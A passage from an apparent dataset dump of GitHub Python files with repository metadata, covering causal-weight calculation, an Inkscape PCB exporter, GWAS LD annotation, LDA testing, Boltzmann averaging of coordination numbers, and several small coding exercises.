mifwd_list.append(mi_fwd)\n mibwd_list.append(mi_bwd)\n\n if len(weight) > 1:\n\n twodimensions = True\n\n proplist = [propfwd_list, propbwd_list]\n milist = [mifwd_list, mibwd_list]\n siglist = [sigfwd_list, sigbwd_list]\n weightlist = [directional_weightlist, absolute_weightlist]\n\n # Combine weight data\n weights_thisvar_directional = np.asarray(weightlist[0])\n weights_thisvar_directional = weights_thisvar_directional[\n :, np.newaxis\n ]\n\n mis_thisvar_directional = np.asarray(milist[0])\n mis_thisvar_directional = mis_thisvar_directional[\n :, np.newaxis\n ]\n\n datalines_directional = np.concatenate(\n (datalines_directional, weights_thisvar_directional),\n axis=1,\n )\n\n mis_datalines_directional = np.concatenate(\n (mis_datalines_directional, mis_thisvar_directional),\n axis=1,\n )\n\n weights_thisvar_absolute = np.asarray(weightlist[1])\n weights_thisvar_absolute = weights_thisvar_absolute[\n :, np.newaxis\n ]\n\n mis_thisvar_absolute = np.asarray(milist[1])\n mis_thisvar_absolute = mis_thisvar_absolute[:, 
np.newaxis]\n\n datalines_absolute = np.concatenate(\n (datalines_absolute, weights_thisvar_absolute), axis=1\n )\n\n mis_datalines_absolute = np.concatenate(\n (mis_datalines_absolute, mis_thisvar_absolute), axis=1\n )\n\n # Write all the auxiliary weight data\n # Generate and store report files according to each method\n (\n auxdata_thisvar_directional,\n auxdata_thisvar_absolute,\n ) = weightcalculator.report(\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n weightlist,\n box,\n proplist,\n milist,\n )\n\n auxdata_directional.append(auxdata_thisvar_directional)\n auxdata_absolute.append(auxdata_thisvar_absolute)\n\n # Do the same for the significance threshold\n if weightcalcdata.allthresh:\n sigthreshlist = [\n directional_sigthreshlist,\n absolute_sigthreshlist,\n ]\n\n sigthresh_thisvar_directional = np.asarray(\n sigthreshlist[0]\n )\n sigthresh_thisvar_directional = sigthresh_thisvar_directional[\n :, np.newaxis\n ]\n\n datalines_sigthresh_directional = np.concatenate(\n (\n datalines_sigthresh_directional,\n sigthresh_thisvar_directional,\n ),\n axis=1,\n )\n\n sigthresh_thisvar_absolute = np.asarray(sigthreshlist[1])\n sigthresh_thisvar_absolute = sigthresh_thisvar_absolute[\n :, np.newaxis\n ]\n\n datalines_sigthresh_absolute = np.concatenate(\n (\n datalines_sigthresh_absolute,\n sigthresh_thisvar_absolute,\n ),\n axis=1,\n )\n\n else:\n\n twodimensions = False\n\n weights_thisvar_neutral = np.asarray(weightlist)\n weights_thisvar_neutral = weights_thisvar_neutral[\n :, np.newaxis\n ]\n\n datalines_neutral = np.concatenate(\n (datalines_neutral, weights_thisvar_neutral), axis=1\n )\n\n # Write all the auxilliary weight data\n # Generate and store report files according to each method\n proplist = None\n\n auxdata_thisvar_neutral = weightcalculator.report(\n weightcalcdata,\n causevarindex,\n affectedvarindex,\n weightlist,\n box,\n proplist,\n )\n\n auxdata_neutral.append(auxdata_thisvar_neutral)\n\n # Write the significance thresholds to file\n if weightcalcdata.allthresh:\n sigthresh_thisvar_neutral = np.asarray(sigthreshlist)\n sigthresh_thisvar_neutral = sigthresh_thisvar_neutral[\n :, np.newaxis\n ]\n\n datalines_sigthresh_neutral = np.concatenate(\n (\n datalines_sigthresh_neutral,\n sigthresh_thisvar_neutral,\n ),\n axis=1,\n )\n\n if (\n not (newconnectionmatrix[affectedvarindex, causevarindex] == 0)\n and (exists is False)\n and (writeoutput is True)\n ):\n\n if twodimensions:\n writecsv_weightcalc(\n filename(directional_name, boxindex + 1, causevar),\n datalines_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(absolute_name, boxindex + 1, causevar),\n datalines_absolute,\n headerline,\n )\n\n # Write mutual information over multiple delays to file just as for transfer entropy\n writecsv_weightcalc(\n filename(mis_directional_name, boxindex + 1, causevar),\n mis_datalines_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(mis_absolute_name, boxindex + 1, causevar),\n mis_datalines_absolute,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(auxdirectional_name, boxindex + 1, causevar),\n auxdata_directional,\n weightcalculator.data_header,\n )\n\n writecsv_weightcalc(\n filename(auxabsolute_name, boxindex + 1, causevar),\n auxdata_absolute,\n weightcalculator.data_header,\n )\n\n if weightcalcdata.allthresh:\n writecsv_weightcalc(\n filename(sig_directional_name, boxindex + 1, causevar),\n datalines_sigthresh_directional,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(sig_absolute_name, boxindex + 1, causevar),\n 
datalines_sigthresh_absolute,\n headerline,\n )\n\n else:\n writecsv_weightcalc(\n filename(neutral_name, boxindex + 1, causevar),\n datalines_neutral,\n headerline,\n )\n\n writecsv_weightcalc(\n filename(auxneutral_name, boxindex + 1, causevar),\n auxdata_neutral,\n weightcalculator.data_header,\n )\n\n if weightcalcdata.allthresh:\n writecsv_weightcalc(\n filename(sig_neutral_name, boxindex + 1, causevar),\n datalines_sigthresh_neutral,\n headerline,\n )\n\n print(\n \"Done analysing causal variable: \"\n + causevar\n + \" [\"\n + str(causevarindex + 1)\n + \"/\"\n + str(len(weightcalcdata.causevarindexes))\n + \"]\"\n )\n\n return None\n\n\ndef run(non_iter_args, do_multiprocessing):\n [\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n ] = non_iter_args\n\n partial_gaincalc_oneset = partial(\n calc_weights_oneset,\n weightcalcdata,\n weightcalculator,\n box,\n startindex,\n size,\n newconnectionmatrix,\n method,\n boxindex,\n filename,\n headerline,\n writeoutput,\n )\n\n if do_multiprocessing:\n pool = Pool(processes=pathos.multiprocessing.cpu_count())\n pool.map(partial_gaincalc_oneset, weightcalcdata.causevarindexes)\n\n # Current solution to no close and join methods on ProcessingPool\n # https://github.com/uqfoundation/pathos/issues/46\n\n s = pathos.multiprocessing.__STATE[\"pool\"]\n s.close()\n s.join()\n pathos.multiprocessing.__STATE[\"pool\"] = None\n\n else:\n for causevarindex in weightcalcdata.causevarindexes:\n partial_gaincalc_oneset(causevarindex)\n\n return None\n","repo_name":"sjstreicher/FaultMap","sub_path":"faultmap/gaincalc_oneset.py","file_name":"gaincalc_oneset.py","file_ext":"py","file_size_in_byte":18198,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"77"} +{"seq_id":"72218395449","text":"import inkex\nfrom inkex.paths import CubicSuperPath, Path\nfrom inkex.transforms import Transform\nfrom inkex.bezier import cspsubdiv\n\nclass MyEffect(inkex.EffectExtension):\n\n header = \"Element[\\\"\\\" \\\"InkscapeExportedElement\\\" \\\"\\\" \\\"\\\" 0 0 -10000 -10000 0 100 \\\"\\\"] # header stub\\n(\\n\"\n footer = \") # footer stub\\n\"\n\n def add_arguments(self, pars):\n pars.add_argument(\"--flatness\",\n dest=\"flat\",\n type=float, \n default=0.2,\n help=\"Minimum flatness of the subdivided curves\")\n pars.add_argument(\"-m\", \"--mirror\",\n type=inkex.Boolean, \n dest=\"mirror\", default=\"FALSE\",\n help=\"Mirror Y-Axis\")\n pars.add_argument(\"-x\", \"--xOrigin\",\n type=float, \n dest=\"xOrigin\", default=0.0,\n help=\"X Origin (pixels)\")\n pars.add_argument(\"-y\", \"--yOrigin\",\n type=float, \n dest=\"yOrigin\", default=0.0,\n help=\"Y Origin (pixels)\")\n pars.add_argument(\"-s\", \"--scaling\",\n type=int, \n dest=\"scaling\", default=1.0,\n help=\"Scaling\")\n pars.add_argument(\"-t\", \"--thickness\",\n type=int,\n dest=\"thickness\", default=8,\n help=\"Line thickness (mil/thou)\")\n pars.add_argument(\"-p\", \"--plotInvisibleLayers\",\n type=inkex.Boolean, \n dest=\"plotInvisibleLayers\", default=\"FALSE\",\n help=\"Plot invisible layers\")\n\n def process_path(self, node, transform):\n path = node.path.to_absolute()\\\n .transform(node.composed_transform())\\\n .transform(transform)\\\n .to_superpath()\n if path:\n cspsubdiv(path, self.options.flat)\n # path to HPGL commands\n first = True\n oldPosX = -1\n oldPosY = -1\n for singlePath in path:\n for singlePathPoint in singlePath:\n posX, 
posY = singlePathPoint[1]\n # the first point of a subpath only sets the start position;\n # subsequent points draw segments from the previous point\n if not first:\n self.fp.append('\\tElementLine(%d %d %d %d %d)\\n' % (oldPosX,oldPosY,posX,posY,self.options.thickness))\n oldPosX = posX\n oldPosY = posY\n first = False\n\n def process_group(self, group):\n \"\"\"flatten layers and groups to avoid recursion\"\"\"\n for child in group:\n if not isinstance(child, inkex.ShapeElement):\n continue\n if child.is_visible():\n if isinstance(child, inkex.Group):\n self.process_group(child)\n elif isinstance(child, inkex.PathElement):\n self.process_path(child, Transform(self.groupmat))\n\n def save(self, stream):\n stream.write(''.join(self.fp).encode('utf-8'))\n\n def effect(self):\n self.fp = ['# gEDA PCB footprint exported from Inkscape\\n']\n self.fp.append(self.header)\n x0 = self.options.xOrigin\n y0 = self.options.yOrigin\n scale = float(self.options.scaling)\n self.options.flat *= scale\n mirror = 1.0\n if self.options.mirror:\n mirror = -1.0\n if self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0]):\n y0 -= float(self.svg.unittouu(self.document.getroot().xpath('@height', namespaces=inkex.NSS)[0]))\n self.groupmat = [[scale, 0.0, 0.0], [0.0, mirror*scale, 0.0]]\n doc = self.document.getroot()\n self.process_group(doc)\n self.fp.append(self.footer)\n\nif __name__ == '__main__': #pragma: no cover\n MyEffect().run()\n\n# vim: expandtab shiftwidth=4 tabstop=8 softtabstop=4 encoding=utf-8 textwidth=99\n","repo_name":"erichVK5/inkscape2pcb","sub_path":"geda_pcb_output.py","file_name":"geda_pcb_output.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"}
+{"seq_id":"22562382466","text":"from pathlib import Path\nfrom typing import Tuple\n\nimport torch\nfrom hydra.core.config_store import ConfigStore\n\nfrom modules import VectorQuantizedVAE\n\n# useful paths\nROOT_DIR = Path(__file__).parent.parent\nCONFIG_DIR = ROOT_DIR / \"configs\"\n\n# singleton objects\nCONFIG_STORE = ConfigStore.instance()\n\n\ndef refine_latents(\n model: VectorQuantizedVAE,\n latents_1: torch.Tensor,\n latents_2: torch.Tensor,\n mixtures: torch.Tensor,\n n_iterations: int = 2000,\n learning_rate: float = 1e-3,\n regularizer_coeff: float = 1e-3,\n) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Refine latent codes for better separation.\n\n The refinement operation uses Adam to optimize the latent vectors in input\n so that their decoded mixture stays close to the observed mixtures.\n\n Args:\n model: vq-vae model\n latents_1: separation latent codes. Shape (batch size, ...)\n latents_2: separation latent codes. Shape (batch size, ...)\n mixtures: mixtures. Shape 
(batch size, ...)\n n_iterations: number of iterations of the optimization procedure\n learning_rate: learning rate to iuse\n regularizer_coeff: coefficient used for regularization\n\n Returns:\n The two separated signals.\n \"\"\"\n # DO NOT REMOVE: necessary, although not sure why\n latents_1 = torch.stack([latents_1], 0).squeeze(0)\n latents_2 = torch.stack([latents_2], 0).squeeze(0)\n\n # copy initial values\n gen1 = latents_1.clone().detach().requires_grad_(True)\n gen2 = latents_2.clone().detach().requires_grad_(True)\n latents_1 = latents_1.clone().detach()\n latents_2 = latents_2.clone().detach()\n mixtures = mixtures.clone().detach()\n\n optimizer = torch.optim.Adam([gen1, gen2], lr=learning_rate)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 100, 0.5)\n\n # optimize\n for s in range(n_iterations):\n geni1 = model.decode_latents(gen1)\n geni2 = model.decode_latents(gen2)\n geni_mixtures = (geni1 + geni2) / 2.0\n\n reg = regularizer_coeff * torch.mean((gen1 - latents_1) ** 2 + (gen2 - latents_2) ** 2)\n loss = torch.mean((geni_mixtures - mixtures).pow(2)) + reg\n loss.backward()\n\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()\n\n return geni1, geni2\n","repo_name":"gladia-research-group/latent-autoregressive-source-separation","sub_path":"lass_mnist/lass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"77"} +{"seq_id":"43439515456","text":"#The purpose of this code is to annotate all the SNPs that are in high LD with the sQTLs we identified (only SNPs annotated in GWAS catalog AND in high LD with sQTLs are outputted)\n\n## inputs gwas catalog and plink ld output \nimport sys,os,re\nfrom collections import defaultdict\n\ndef read_in_plink(plink_fn): #the purpose of this function is to pair our SNP with SNPs in high LD with our SNP and get the r square of this pair\n plink_in = open(plink_fn,'r')\n firstline = True\n ld={} #dictionary with key=SNP pair and key=r square value of this pair\n p = defaultdict(list) #dictionary with value=SNP in our result and key=SNPs that are in high LD with our SNPs\n for line in plink_in: \n if firstline: #skip the first line\n firstline = False\n continue\n fields = line.rstrip().split()\n p[fields[5]].append(fields[2]) #fields[2] is the SNP in our result and fields[5] is the SNPs that are in high LD with our SNPs\n ld[fields[5]+'\\t'+fields[2]]=fields[6]\n plink_in.close()\n return p,ld\n\ndef main():\n gwas_fn = sys.argv[2]\n plink_fn = sys.argv[1]\n plink_dict,ld = read_in_plink(plink_fn)\n fout=open(plink_fn+'.LD.result.txt','w')\n gwas_dict = {} #dictionary with key=SNPs that are in high LD with our SNP and value=GWAS catelog information of that SNP\n firstline = True\n gwas_in = open(gwas_fn)\n for line in gwas_in:\n if firstline: #skip the first line\n firstline = False\n continue\n fields = line.rstrip().split('\\t')\n if fields[21] in plink_dict: #if the SNP in GWAS catalog is one of the SNPs that are in high LD with our SNP\n \tif fields[21] in gwas_dict: #if we have already have this SNP in our result (one SNP can appear in different rows in the GWAS catalog BUT the annotation can be different, so we keep them all)\n \t\tgwas_dict[fields[21]] = [m+';'+n for m,n in zip(gwas_dict[fields[21]],fields)]\n \tif fields[21] not in gwas_dict:\n \t\tgwas_dict[fields[21]] = fields #we add the information of that SNP into our result\n gwas_in.close()\n for snp in gwas_dict: #for each SNP that is (1) in GWAS 
catalog and (2) in high LD with our SNP\n for s in plink_dict[snp]: #get the SNPs in our result that pairs with snp from the previous step\n r_2=''\n if s+'\\t'+snp in ld: #if the pair is in this order\n r_2=ld[s+'\\t'+snp] #get the r square\n else: #if the pair is in the reverse order\n r_2=ld[snp+'\\t'+s] #get the r square\n #print s, '\\t', snp, '\\t',gwas_dict[snp][7], '\\t',gwas_dict[snp][34],'\\t',gwas_dict[snp][27], '\\t',gwas_dict[snp][1],'\\t',r_2\n fout.write('{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\n'.format(s, snp,gwas_dict[snp][7],gwas_dict[snp][34],gwas_dict[snp][27],gwas_dict[snp][1],r_2))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Xinglab/GTEx-brain-sQTL","sub_path":"09_sQTL_analysis/03_sQTL_calculation/8_gwas_linkage_NHGRI.py","file_name":"8_gwas_linkage_NHGRI.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"19048058821","text":"class node:\r\n def __init__(self,nextnode,val):\r\n \r\n self.nextnode=nextnode\r\n self.val=val\r\n\r\nclass stack:\r\n def __init__(self,top,size):\r\n \r\n self.top=top\r\n self.size=size\r\n \r\n def push(self,value):\r\n \r\n n=node(None,value)\r\n n.nextnode=self.top\r\n self.top=n\r\n self.size+=1\r\n\r\n def pop(self):\r\n \r\n if(self.top==None):return None\r\n n=self.top\r\n self.top=n.nextnode\r\n self.size-=1\r\n return n\r\n\r\n def peek(self):\r\n if(self.top==None):return None\r\n return self.top.val\r\n\r\nletters=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\nstring=str(input(\"Give a string to find it's reverse\\n\"))\r\nprint(string,'\\n')\r\n\r\nS=stack(None,0)\r\n\r\nfor i in range(len(string)):\r\n S.push(string[i])\r\n print(S.peek())\r\n \r\nprint(\"\\n\\n\")\r\n\r\nfor i in range(len(string)):\r\n print(S.pop().val)\r\n \r\n","repo_name":"Vikhyat2603/Old-Stuff","sub_path":"Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20259279672","text":"import json\nimport torch\n\n\n\ndef build_optimizer_parameters(config, model):\n\n param_optimizer = list(model.named_parameters())\n param_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight', 'pos_embed','relative_position_bias_table']\n\n if \"weight_decay\" in config.TRAINING.keys():\n weight_decay = config.TRAINING[\"weight_decay\"]\n else:\n weight_decay = 0.01\n\n\n optimizer_grouped_parameters = [{\n 'params': [\n p for n, p in param_optimizer\n if not any(nd in n for nd in no_decay) and p.requires_grad\n ],\n 'weight_decay':\n weight_decay\n }, {\n 'params':\n [p for n, p in param_optimizer if any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay':\n 0.0\n }]\n \n return optimizer_grouped_parameters","repo_name":"microsoft/XPretrain","sub_path":"LF-VILA/src/optimization/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"77"} +{"seq_id":"71893790970","text":"\nimport os\nimport sys\nimport numpy as np\nfrom scipy.special import softmax\n\n\n#cutoff_coord = float(sys.argv[1])\n\nclass BOLTZMANN:\n def __init__(self):\n #self.cutoff = cutoff \n self.ranked_path = 'ranked'\n\n def GET_COORD_NO(self, rank_w_energy, cutoff):\n output_clusters = 
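# A minimal, self-contained illustration of the PLINK .ld parsing convention
# used in the annotation script above: column 3 (SNP_A) is the query sQTL SNP,
# column 6 (SNP_B) is the partner SNP, and column 7 is their r^2. The sample
# lines below are made up.
from collections import defaultdict

sample = """CHR_A BP_A SNP_A CHR_B BP_B SNP_B R2
1 100 rs1 1 200 rs9 0.91
1 100 rs1 1 300 rs7 0.85"""

partners = defaultdict(list)  # high-LD SNP -> the query SNPs it pairs with
r2 = {}                       # "SNP_B\tSNP_A" -> r^2 of the pair
for line in sample.splitlines()[1:]:
    fields = line.split()
    partners[fields[5]].append(fields[2])
    r2[fields[5] + "\t" + fields[2]] = fields[6]

print(partners["rs9"], r2["rs9\trs1"])  # ['rs1'] 0.91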
[os.path.join('ranked', str(x)) for x in rank_w_energy.keys()]\n output_clusters.sort()\n cluster_mean_coord_no = {}\n for i in output_clusters:\n geometry_file = os.path.join(i, 'geometry.in')\n geometry_next_file = os.path.join(i, 'geometry.in.next_step')\n if os.path.exists(geometry_next_file):\n with open(geometry_next_file, 'r') as f:\n geo = [x for x in f.readlines() if 'atom' in x]\n elif os.path.exists(geometry_file):\n with open(geometry_file, 'r') as f:\n geo = [x for x in f.readlines() if 'atom' in x]\n\n geo = [x.split() for x in geo]\n geo_array = np.array(geo)[:, 1:4].astype(float)\n atom_array = np.array(geo)[:, 4:].ravel()\n matching_indicies_cat = np.where(atom_array == 'Al')[0]\n matching_indicies_an = np.where(atom_array == 'F')[0]\n\n coord_no = 0\n for j in matching_indicies_cat:\n for k in matching_indicies_an:\n dist = np.linalg.norm(geo_array[j] - geo_array[k])\n if dist < cutoff:\n coord_no += 1\n cluster_mean_coord_no[i] = coord_no/len(matching_indicies_cat)\n return cluster_mean_coord_no\n\n\n\n def GET_DFT_ENERGY(self):\n output_clusters = [os.path.join(self.ranked_path, x, 'aims.out') for x in os.listdir(self.ranked_path) \\\n if x.isdigit() if os.path.exists(os.path.join(self.ranked_path, x, 'aims.out')) \\\n if os.path.isdir(os.path.join(self.ranked_path, x))]\n\n output_clusters = sorted(output_clusters, key=lambda x: int(x.split('/')[1]))\n\n IP_order_rank_w_energy = {}\n for i in output_clusters[:300]:\n with open(i, 'r') as f:\n contents = f.readlines()[-200:]\n energy = float([x for x in contents if '| Total energy of the DFT / Hartree-Fock s.c.f. calculation :' in x][0].split()[-2])\n IP_order_rank_w_energy[str(i.split('/')[-2])] = energy\n\n DFT_order_rank_w_energy = sorted(IP_order_rank_w_energy.items(), key=lambda item: item[1])\n DFT_order_rank_w_energy = dict(DFT_order_rank_w_energy)\n\n check_loc = [x for x in os.listdir('./') if x == 'boltzmann' if os.path.isdir(x)]\n if len(check_loc) == 0:\n os.mkdir('boltzmann')\n else: pass\n\n with open(f'boltzmann/aims_rank.txt', 'w') as f:\n for k, v in DFT_order_rank_w_energy.items():\n f.write(f\"{k}, {v}\")\n return DFT_order_rank_w_energy, IP_order_rank_w_energy\n\n\n\n def BOLTZMANN_WEIGHT(self, coord_dict, energy_dict, cutoff):\n\n # up to DFT rank 300\n COORD_values = list(coord_dict.values())[:300]\n E_values_eV = list(energy_dict.values())[:300] \n\n # Convert energies from eV to Joules\n eV_to_J = 1.602176634e-19 # Conversion factor from eV to Joules\n E_values = [E * eV_to_J for E in E_values_eV]\n \n # Set the Boltzmann constant and temperature\n k_B = 1.380649e-23 # Boltzmann constant (in J/K)\n T = 300 \n #T = 273.15 + 110 # Temperature (in Kelvin)\n \n # Subtract the minimum energy from all energy values\n E_min = min(E_values)\n E_shifted = np.array(E_values) - E_min # delta E\n \n # Calculate the Boltzmann weights for each energy value (partition function)\n energies_divided_by_kT = -E_shifted / (k_B * T)\n exp_values = np.exp(energies_divided_by_kT) # Boltzmann function\n partition_function = np.sum(exp_values) # partition function (Z)\n \n #boltzmann_weights of coordination no = COORD_values * exp_values / Z \n boltzmann_weights = COORD_values * exp_values / partition_function \n mean_boltzmann_weights = np.sum(COORD_values * exp_values) / partition_function\n\n #print(\"Boltzmann weights:\", boltzmann_weights)\n list_boltzmann_weights = [str(x) for x in boltzmann_weights.tolist()]\n\n check_loc = [x for x in os.listdir('./') if x == 'boltzmann' if os.path.isdir(x)]\n if len(check_loc) 
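# The coordination-number count from GET_COORD_NO above, vectorized with numpy
# broadcasting instead of the double loop: the mean number of anion (F) atoms
# within `cutoff` of each cation (Al). The coordinates are arbitrary stand-ins
# for geometry.in data.
import numpy as np

cat = np.array([[0.0, 0.0, 0.0], [3.0, 0.0, 0.0]])                  # e.g. Al
an = np.array([[1.5, 0.0, 0.0], [0.0, 1.2, 0.0], [9.0, 9.0, 9.0]])  # e.g. F
cutoff = 2.0

dists = np.linalg.norm(cat[:, None, :] - an[None, :, :], axis=-1)
mean_coord = (dists < cutoff).sum() / len(cat)
print(mean_coord)  # 1.5: the first Al sees two F within the cutoff, the second sees one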
== 0:\n os.mkdir('boltzmann')\n else: pass\n\n with open(f'boltzmann/boltzmann_weights_{cutoff}.txt', 'w') as f:\n f.write(f'{cutoff}\\n')\n f.write(str(mean_boltzmann_weights.tolist()) + '\\n\\n')\n f.write('boltzmann_weights')\n for i in list_boltzmann_weights:\n f.write('\\n'+i)\n return boltzmann_weights, mean_boltzmann_weights\n\n\nif __name__ == \"__main__\":\n BOLTZMANN = BOLTZMANN()\n rank_w_energy = BOLTZMANN.GET_DFT_ENERGY() # rank_w_energy[0] = DFT_order_rank_w_energy, ~[1] = IP_order\n for i in np.arange(1.7, 3.1, 0.1): # cutoff distance in every 0.1 Ang from 1.7 Ang to 3.0 Ang\n i = np.round(i, 1)\n print(i)\n cluster_mean_coord_no = BOLTZMANN.GET_COORD_NO(rank_w_energy[0], i)\n boltzmann_weights, mean_boltzmann_weights = BOLTZMANN.BOLTZMANN_WEIGHT(cluster_mean_coord_no, rank_w_energy[0], i)\n print(f\"cutoff distance: {i} Ang\")\n print(f\"DFT energy order: {rank_w_energy[0]}\")\n print(f\"Average Al atom coordination number: {cluster_mean_coord_no}\")\n print(f\"Boltzmann weight: {boltzmann_weights}\")\n print(f\"Mean Boltzmann weight: {mean_boltzmann_weights}\")\n","repo_name":"DGKang234/PhD_tool","sub_path":"aims_auto/boltzmann_coord.py","file_name":"boltzmann_coord.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28589284378","text":"def main():\n greeting = input(\"Greeting: \").strip()\n money = value(greeting)\n print(money)\n\ndef value(greeting):\n if (\"Hello\".casefold() in greeting.casefold()):\n return 0\n elif (greeting[0].casefold() == \"H\".casefold()):\n return 20\n else:\n return 100\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mfdestiny/root","sub_path":"coursework/cs50/CS50P/test_bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22520894477","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom typing import List, Optional\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def numComponents(self, head: Optional[ListNode], nums: List[int]) -> int:\n nums = set(nums)\n p = head\n ans = 0\n while p is not None:\n if p.val in nums:\n ans += 1\n while p is not None and p.val in nums:\n p = p.next\n else:\n p = p.next\n\n return ans","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/817.链表组件/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"73596352887","text":"import unittest\nimport os\nimport warnings\n\nimport numpy as np\nfrom numpy.random import default_rng\n\nfrom scipy.spatial import distance_matrix\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy import stats\n\nfrom lda.lda import TensorDecompositionLDA\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom wordcloud import WordCloud\n\nfrom config import Config \nlogging = Config.logging\n\ndef topicRecoveryError( Beta, PhiGrnd ):\n\t\"\"\"\n\t\tParameters:\n\t\t-----------\n\t\tBeta - a d x k matrix of estimated word distributions for each of the k topics\n\t\tPhiGrnd - a d x k matrix of the true word distributions for each topic\n\n\t\tReturns:\n\t\t--------\n\t\terror - a scalar 
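# A compact numpy sketch of the Boltzmann averaging performed in
# BOLTZMANN_WEIGHT above: shift the energies by their minimum, weight each
# structure by exp(-dE / kT), normalize by the partition function, and take
# the weighted mean of a per-structure observable. The energies and
# coordination numbers below are invented.
import numpy as np

k_B = 1.380649e-23   # Boltzmann constant (J/K)
T = 300.0            # temperature (K)
eV_to_J = 1.602176634e-19

energies_eV = np.array([-10.00, -9.98, -9.90])  # hypothetical DFT energies
coord_no = np.array([5.6, 5.2, 4.8])            # hypothetical observable

dE = (energies_eV - energies_eV.min()) * eV_to_J
weights = np.exp(-dE / (k_B * T))
weights /= weights.sum()                        # divide by partition function Z
mean_coord = float(np.sum(coord_no * weights))
print(weights, mean_coord)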
representing the recovery error of the estimated Beta with respect to the ground truth\n\t\"\"\"\n\t# compute the full pairwise L1 distance between\n\t# the ground beta and the estimated Beta\n\tcost = distance_matrix( Beta.T, PhiGrnd.T, p=1 )\n\t# treat the L1 distances as the cost matrix of a bipartite matching\n\t# and solve the linear assignment problem to match estimated topics\n\t# with ground truth topics\n\trow_ind, col_ind = linear_sum_assignment( cost )\n\t# average the k L1 distances between matched pairs to compute the error\n\treturn np.average( cost[ row_ind, col_ind ] )\n\n\nclass TestTensorDecompositionLDA( unittest.TestCase ):\n\tdef setUp( self ):\n\t\tself.rng = default_rng( 12018231 )\n\t\tself.assetpath = os.path.join( os.getcwd(), 'tests/assets' )\n\n\tdef testTensorDecompositionLDA( self ):\n\t\t# pick the number of topics to infer\n\t\tk = 50\n\t\t# pick the size of the corpus\n\t\tnum_documents = self.rng.integers( 100, 200 )\n\t\t# pick the size of the vocabulary\n\t\tnum_words = 500\n\t\t# pick model parameter alpha0\n\t\talpha0 = 1.\n\t\t# create the corpus as a word frequency matrix\n\t\tC = self.rng.integers( 0, 3, size=( num_words, num_documents ) )\n\t\t# create tensor LDA with default arguments\n\t\tTLDA = TensorDecompositionLDA( k, alpha0 )\n\t\t# train\n\t\talphas, Phi = TLDA.fit( C )\n\t\t# Phi should have one column for each of the k topics\n\t\tself.assertEqual( ( num_words, k ), Phi.shape )\n\t\t# each column of Phi should be a distribution over words representing a topic\n\t\tnp.testing.assert_array_almost_equal( np.ones( k ), np.sum( Phi, axis=0 ) )\n\t\t# the alphas should sum to alpha0\n\t\tself.assertAlmostEqual( alpha0, np.sum( alphas ) )\n\n\tdef testTDLDAInference( self ):\n\t\t\"\"\"\n\t\t\tEvaluation using synthetic data from Wang et al. 2014\n\t\t\"\"\"\n\t\tk = 50\t# the number of topics\n\t\tV = 3000 # the size of the vocabulary\n\t\teta = 100 # the Poisson distribution parameter for drawing document lengths\n\t\talpha = 1./k * np.ones( k ) # the Dirichlet parameters for drawing topic distributions\n\t\tBeta = 200./V * np.ones( shape=( V, k ) ) # the Dirichlet parameters for drawing conditional word distributions\n\t\tD = 5000 # number of documents to generate\n\t\tPhiBase = np.tile( 1./V * np.ones( V ), ( k, 1 ) ).T # uniform distribution as baseline\n\n\t\titers = 5\n\t\tbaseline_errors = []\n\t\ttdlda_errors = []\n\t\tslda_errors = []\n\n\t\tfor t in range( iters ):\n\t\t\t# generate the synthetic corpus and get the true Beta\n\t\t\tC, PhiGrnd = TensorDecompositionLDA.sample( eta, alpha, Beta, k, D)\n\t\t\t# run the inference algorithm\n\t\t\tTLDA = TensorDecompositionLDA( k, np.sum( alpha ) )\n\t\t\talphas, Phi = TLDA.fit( C )\n\t\t\t# compute the error\n\t\t\ttdlda_errors.append( topicRecoveryError( Phi, PhiGrnd ) )\n\t\t\tbaseline_errors.append( topicRecoveryError( PhiBase, PhiGrnd ) )\n\n\t\t# compute error stats\n\t\tS = stats.describe( 